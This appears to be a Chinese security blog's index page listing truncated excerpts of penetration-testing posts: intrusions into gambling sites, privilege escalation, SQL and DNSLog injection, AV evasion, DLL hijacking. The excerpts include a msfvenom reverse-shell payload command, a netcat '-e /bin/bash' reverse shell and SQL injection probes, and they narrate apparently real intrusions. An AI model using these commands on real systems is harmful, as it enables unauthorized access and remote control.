TypechoJoeTheme

Harvey

统计
登录
用户名
密码
/
注册
用户名
邮箱
搜索到 14 篇与 渗透 的结果
2021-01-09

从代码审计到拿下某菠菜客服站

从代码审计到拿下某菠菜客服站
起 因给的目标只有一个后台系统登陆页面。上去就是一个弱口令怼他,但这种菠菜站基本不可能。这时候就要体现信息搜集的重要性了,毕竟渗透最重要的就是信息搜集,废话也不多说,这个过程有点漫长,直接上主菜吧正 文利用fofa、shdan、微步、超级ping进行域名查ip,以及ip反查域名。得到其中一个客服站该站有存储型xss,打进去后返回的全是安卓手机,遂放弃。直接套客服话,有点久远这里就没得图了,通过客服给出的信息,直接批量扫c端同宝塔端口。再ip反查域名得到另一客服站通过目录扫描,发现有install.php文件。好家伙,直接告诉了我是什么客服系统,google一搜,开源的,直接下下来审计一波。放入seay自动审计一波,打开一看,经验多的一看就知道是thinkphp框架。根据安装教程,得知此系统需要绑定到public目录,根据thinkphp的路由规则,web能访问到的目录只有application了。审计过程有点漫长,此处省略。直接上找到的漏洞函数。通过全局搜索upload,发现该函数存在一个黑名单过滤。该函数以文件名中的点来分割名字并存入数组中,且以数组的第二个为后缀。即当文件名为...
Harvey
2021-01-09

渗透,Gamma实验室

30 阅读
0 评论
2021年01月09日
30 阅读
0 评论
2020-12-31

记一次菠菜站对护卫神的利用

记一次菠菜站对护卫神的利用
因为这个站是几个月前日的了,所以图片可能不全,也没办法再补图。写这篇文章的时候,隔壁情侣正在鼓掌,声音贼响,导致我写的东西可能没有过一遍脑子,写的可能有点混乱。另外值得一提的是,为啥我们做安全的经常隔壁碰到这种人?已知目标网站之前客户有给过这种网站,所以我记忆尤深,针对这种站一般你可以直接放弃正常测试流程了,因为经验告诉我,网站主站功能基本上很少有漏洞的,只能从旁站下手。Ctrl+u查看一波没发现有什么存在泄漏的js,回过头发现发现网站右上角有个优惠活动大厅打开后页面似曾相识随便点开一个活动,好像可以随便提交文字,没有过滤,我信心满满输入xss,提交,然而两天过去了,并没什么叼用,我当时的心情真是像云像雾又像雨。然而我又发现下面有个审核进度查询,打开后会让你输入用户名,既然有输入用户名,那应该就是有带入数据库查询,习惯性加了个’点击查询,10秒过去了,没响应,我懵了,输入正常不存在的账号测试,是会弹出记录的,但是加单引号查询却一点响应都没有。F12-network抓包,发现是有发送请求的,很明显了,有注入,而且报错是页面是thinkphp,从最下角看版本是3.2.3,这个版本真的...
Harvey
2020-12-31

渗透,Gamma实验室

32 阅读
0 评论
2020年12月31日
32 阅读
0 评论
2020-12-30

windows提权看这一篇就够了

windows提权看这一篇就够了
freebuf链接:https://www.freebuf.com/articles/terminal/259256.html简 介windows在日常的渗透中经常遇到,而在内网之前,经常会在所拿到的跳板机进行提权,这样后面横向,内网才能更好的展开(抓hash,必须得系统或管理员权限),所以这里做了一次window提权总结,建议收藏,反复看,熟能生巧!提权从目的可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限。(最常见的) 横向提权:获取同级别角色的权限。(根据实际的需求) Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、窃取令牌提权、bypassuac提权,第三方软件/服务提权,WEB中间件漏洞提权等。提权思维导图:提权思路1.系统内核溢出漏洞提权简介:此提权方法是利用系统本身存在的一些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对比systeminfo信息中的补丁信息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以提权提升的exp注意,只要对应的补丁号加上对应的系统的版本的提权ex...
Harvey
2020-12-30

渗透,Gamma实验室

31 阅读
0 评论
2020年12月30日
31 阅读
0 评论
2020-12-05

记录某博彩网站渗透

记录某博彩网站渗透
最初,我得到的只有一个后台网址,深深吸了口烟,可攻击点太少了。如果没有弱口令,注入,和直接rce的点,是很难打开缺口的所以首先第一步要做的事情进行信息搜集了!渗透的本质是信息收集的在网络空间安全搜索引擎fofa上查询一下,再就是端口扫描 ,直接略过,懂的都懂。有利用价值的端口:80,81,1433,3389脆弱点:http://49.xxx.xx.xxx:81/Login/index但是通过一段常规操作操作后,发现后台登录界面存在堆叠注入!且获得如下信息:SQL注入post包(在响应包中得到ASP.NET+Microsoft-IIS/7.5)权限:SA刚开始得到注入就想着进入后台看看,但是没有回显,就肝了一段时间的py脚本。得到密码进入后台,模板千篇一律,无数据备份,无修改模板,上传个人判断基于白名单,有编辑器不过示例代码已删除,留言板不可留言,回过头来又看注入,既然是堆叠注入,那就可以执行SQL语句,然后一顿操作,嗯嗯嗯… 没有回显,代码如下:以为到这里就结束了,没想到 3389端口登录失败,1433端口连接失败!这里我很懵,经过大佬的一番指导,可以把注入信息通过外带DNSLl...
Harvey
2020-12-05

渗透,Gamma实验室

28 阅读
0 评论
2020年12月05日
28 阅读
0 评论
2020-11-11

来自上古的提权技术-通配符注入

来自上古的提权技术-通配符注入
前言:正如标题所说,此技术很早以前就有了,但是其中一些利用思路也值得我们借鉴,因为网站运维人员或管理员,经常会备份网站,以及设置一些定时任务来优化网站管理,所有这项攻击技术,我们也会经常用到。基础知识在shell终端中,我们经常用通配符来偷懒,来匹配我们想要的内容,无论是文件还是目录,都适用。认识部分通配符:* 匹配任意多个字符 ? 代表任意单个字符 [ ] 代表“[”和“]”之间的某一个字符,比如[0-9]可以代表0-9之间的任意一个数字,[a-zA-Z]可以代表a-z和A-Z之间的任意一个字母,字母区分大小写。 – 代表一个字符。 ~ 用户的根目录。通配符劫持的第一次利用-chown命令扩展(chown劫持)如果你对Linux/Unix系统稍微了解过,就知道,在系统下,一切皆文件,而文件也会属于某个用户,某个组,也会相应的文件操作的权限,可读可写可执行。而chown命令则可以更改文件的这些属性,详情可以查看linux命令手册。其中我们重点关注 --reference=RFILE 选项我们来看看它自己给的解释use RFILE's owner and group rather...
Harvey
2020-11-11

渗透,Gamma实验室

25 阅读
0 评论
2020年11月11日
25 阅读
0 评论
2020-11-04

共享对象注入

共享对象注入
“如何在不解密的情况下,破解SSL的明文数据?那当然是不要让明文加密了!逻辑鬼才不容反驳”首先,我们得了解一下基础知识程序库可分三类:静态库,共享库和动态加载库静态库,是在执行程序运行前就已经加入到执行码中,在物理上成为执行程序的一部分;共享库,是在执行程序启动时被加载到执行程序中,这样的库可以被多个执行程序共享使用。动态加载库,其实并不是一种真正的库类型,应该是一种库的使用技术,应用程序可以在运行过程中随时加载和使用库。总的来说,可执行文件加载库的方式有两种:动态加载,静态写入第一种库加载方式,是指程序在启动时才会动态调用库函数以及一些功能。第二种库直接就加载写入到可执行文件源代码,所以这样的可执行文件一般都很大。补充(小课堂):加载时间:软件在运行之前,它需要一定的加载时间,用来加载库,和加载到内存。函数倒挂:是指用于拦截对现有函数的调用并对其进行环绕以在运行时修改函数行为的一系列技术。通俗一点,在函数调用时强行增加一个我们能控制的环节!两种加载方式各有优缺点,今天我们要讲的是动态加载共享库的一些骚操作!程序加载时的函数劫持我们拿到一个程序可以先看看它所调用的函数及功能,在l...
Harvey
2020-11-04

渗透,Gamma实验室

26 阅读
0 评论
2020年11月04日
26 阅读
0 评论
2020-10-25

免杀技巧-执行系统命令方式总结

免杀技巧-执行系统命令方式总结
Msf开启会话:> “在渗透测试中,常常会遇到这种情况,上传一个shell上去,连上,却发现无法调用cmd.exe无法执行系统命令,这时候你往往想着,上传一个自己的cmd.exe上去,这是一套行云流水的操作,但把环境条件在变得苛刻一点,杀毒软件将监视二进制文件,例如cmd.exe,那么你会怎么做才能逃避检测?那么接下来就会介绍一些免杀思路。”01-背景Windows系统提供了多个二进制文件,可以使用它们执行任意命令。在这,你是不是想到了什么?既然可以执行命令,那么它将帮助hacker们逃过检测,尤其是对cmd.exe监视的环境下。当然这需要一些前提条件:未正确配置白名单规则(这里涵盖了文件名和路径),使得一些系统可执行文件能够执行。{mtitle}接下来,让我们看看这些项免杀技术的闪光点!{/mtitle}02-正文我们先用msfvenom生成一个木马程序:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.73.136 lport=8888 -f exe -o hacker.exeMsf监听端口888...
Harvey
2020-10-25

渗透,Gamma实验室

23 阅读
0 评论
2020年10月25日
23 阅读
0 评论
2020-10-25

sql注入-联合查询总结

sql注入-联合查询总结
联合查询注入利用的条件:页面上有显示位联合注入的过程:1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取所有数据库名 6、获取数据库所有表名 7、获取字段名 8、获取字段中的数据 数据库判断:1.用@@datadir查看数据库安装目录,能否判断出2.通过各个数据库特有的数据表来判断: mssql:and (select count(*) from sysobjects)>0 and 1=1 Accese:and (select count(*) from msysobjects)>0 and 1=1 mysql:and (select count(*) from information_schema.TABLES)>0 and 1=1 oracle:and (select count(*) from sys.user_tables)>0 and 1=1终极法宝 :报错信息!!!!!!!!!!mysql注入:注入判断: ' " And 1=1 ...
Harvey
2020-10-25

渗透,Gamma实验室

24 阅读
0 评论
2020年10月25日
24 阅读
0 评论
2020-10-20

当输入getsystem会发生什么?

当输入getsystem会发生什么?
“Meterpreter的getsystem命令是非常nice的!在输入getsystem的命令之后,Meterpreter就会神奇的将权限从本地管理员提升为SYSTEM用户。”{mtitle}到底发生了什么事?{/mtitle}getsystem命令包含有三种技术,前两个基于命名管道模拟,最后一个依靠令牌复制。 meterpreter > getsystem -h Usage: getsystem [options] Attempt to elevate your privilege to that of local system. OPTIONS: -h Help Banner. -t The technique to use. (Default to '0'). 0 : All techniques available 1 : Service - Named Pipe Impersonation (In Memory/Admin)...
Harvey
2020-10-20

渗透,Gamma实验室

24 阅读
0 评论
2020年10月20日
24 阅读
0 评论
2020-10-20

数据库DNSLog外带注入-总结

数据库DNSLog外带注入-总结
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入和DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注入mysql-DNSlog外带注入:利用条件1.mysql.ini中secure_file_priv必须为空。(PS:修改mysql.ini文件,在[mysqld]下加入secure_file_priv=) mysql 新版本下secure-file-priv字段 :secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出 当secure_file_pri...
Harvey
2020-10-20

渗透,Gamma实验室

21 阅读
0 评论
2020年10月20日
21 阅读
0 评论
2020-10-19

内网渗透-信息收集

内网渗透-信息收集
前言:内网渗透的本质,是信息收集!,信息收集这一环节其实贯穿了整个内网渗透!01-立足点:Foothold,就是我们拿到内网中一台主机权限,作为内网渗透的突破口,我们所有的操作,包括流量转发,端口扫描,漏扫等操作,都会利用此主机为我们搭桥铺路,为以后的内网横向打下坚实的基础。02-立足点的信息收集立足点信息收集包括:OS、权限、内网IP段、杀软、端口、服务、补丁更新频率、网络连接、共享、会话等注:如果是域内主机,OS、应用软件、补丁、服务、杀软这些一般都是批量安装的。{mtitle}前方干货来袭,注意注意!{/mtitle}1.查询网络配置命令: Windows: ipconfig /all Linux: ifconfig /all cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks2.查询操作系统及软件的信息1)查看操作系统和版本信息 windows:...
Harvey
2020-10-19

渗透,Gamma实验室

25 阅读
0 评论
2020年10月19日
25 阅读
0 评论
2020-10-19

Hacker必备技能-反向shell进阶

Hacker必备技能-反向shell进阶
这是一篇对于实战很有用的文章,因为实战不比靶场环境,会有各种运维人员和其他维护者设置的障碍,就算找到漏洞,拿到shell也不是那么轻松,本文将介绍一些在linux上的应对之法,帮助你更好的hacker。01-文章背景在正常的渗透测试过程中,很多工具的定义是死的,但用法是灵活多变的,这完全取决于你的创造力!我个人认为hacker精神最核心的就是创造力,你的上限完全取决于你的想象。我希望这篇文章能对你有所启示,不居于传统思想约束。不扯蛋了,上才艺吧,众所周知,linux系统是服务器首选的系统,所以我们在日常渗透测试众遇到最多的也是基于linux的各种发行版,他们都有一个特点就是会内置一个网络工具netcat,这玩意不得了,功能十分强大,被称为安全界的瑞士军刀,确实好用!02-得到启示正常情况下,我们会在有漏洞的服务器执行这样的命令:nc -e /bin/bash <接受shell的ip> <端口>攻击机:nc -nlvp <端口>至此我们将获得一个很nice的shell,shell的权限取决于执行nc的权限。但是如果 -e 参数不可以用了,你...
Harvey
2020-10-19

渗透,Gamma实验室

25 阅读
0 评论
2020年10月19日
25 阅读
0 评论
2020-10-19

hacker必会技能!

hacker必会技能!
“无文件恶意软件是一种操作及其简单但又及其危险的威胁,它能使某些网络防御无效。”背景资料:网络安全公司CrowdStrike发布了《2020全球威胁态势报告》,其研究结果显示“无文件恶意软件”攻击的趋势增加,无文件恶意软件的攻击数量超过了恶意软件的攻击数量。2019年,51%的攻击使用了无文件恶意软件技术,而在2018年,只有40%的攻击使用了无文件恶意软件技术。“可以看到无文件恶意软件攻击将会成为以后主流攻击手段,这也让防御方更加头疼!”优点:恶意软件攻击定义为:有恶意文件被写入磁盘,导致会被防护产品检测到试图运行该文件,然后识别或阻止它,这些入侵尝试相对来说比较容易拦截和阻止,通常可以用传统的反恶意软件解决方案有效地阻止。恶意软件攻击定义为:初始没有文件或文件片段被写入磁盘的攻击,例如包括代码从内存执行的攻击、或者利用盗取的凭证使用已知工具进行远程登录的攻击,需要更广泛更复杂的检测技术来可靠地识别和拦截,包括行为检测和人类威胁捕获但是什么是无文件恶意软件。“可以看到无文件恶意软件攻击最大的优点是,一次攻击将不会再执行的.exe或类似的东西,而是直接ARM运行有效载荷!”Pow...
Harvey
2020-10-19

渗透,Gamma实验室

21 阅读
0 评论
2020年10月19日
21 阅读
0 评论
2020-10-19

什么是DLL劫持

什么是DLL劫持
Windows在其基础体系结构中具有DLL的搜索路径(加载DLL文件要遵循目录查找优先级)。如果你可以找出没有绝对路径的可执行文件请求的DLL(触发此搜索过程),则可以将攻击代码的DLL放置在搜索路径的更高位置,以便在实际版本之前找到它,并且Windows会毫不犹豫将攻击代码提供给应用程序。让我们假设Windows的DLL搜索路径如下所示:A目录:<-可执行文件的当前工作目录,最高优先级,首先检查 B目录:\Windows C目录:\ Windows \ system32 D目录:\ Windows \ syswow64 <-最低优先级,最后检查这时候,可执行文件“ Foo.exe”请求加载“ bar.dll”,该文件恰好位于syswow64(D)子目录中。这使您有机会将恶意版本放置在A目录,B目录或C目录中,并将其加载到可执行文件中。如前所述,即使您可以用自己的版本替换DLL,即使是绝对的完整路径也无法防止这种情况。Microsoft Windows使用Windows文件保护机制来保护System32之类的系统路径,但是在企业解决方案中保护可执行文件免受DLL劫持的...
Harvey
2020-10-19

渗透,Gamma实验室

20 阅读
0 评论
2020年10月19日
20 阅读
0 评论
Harvey
最怕碌碌无为还叹平凡可贵
98 文章数
9 评论量

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云

微博热搜榜

  • 获取失败!

今日天气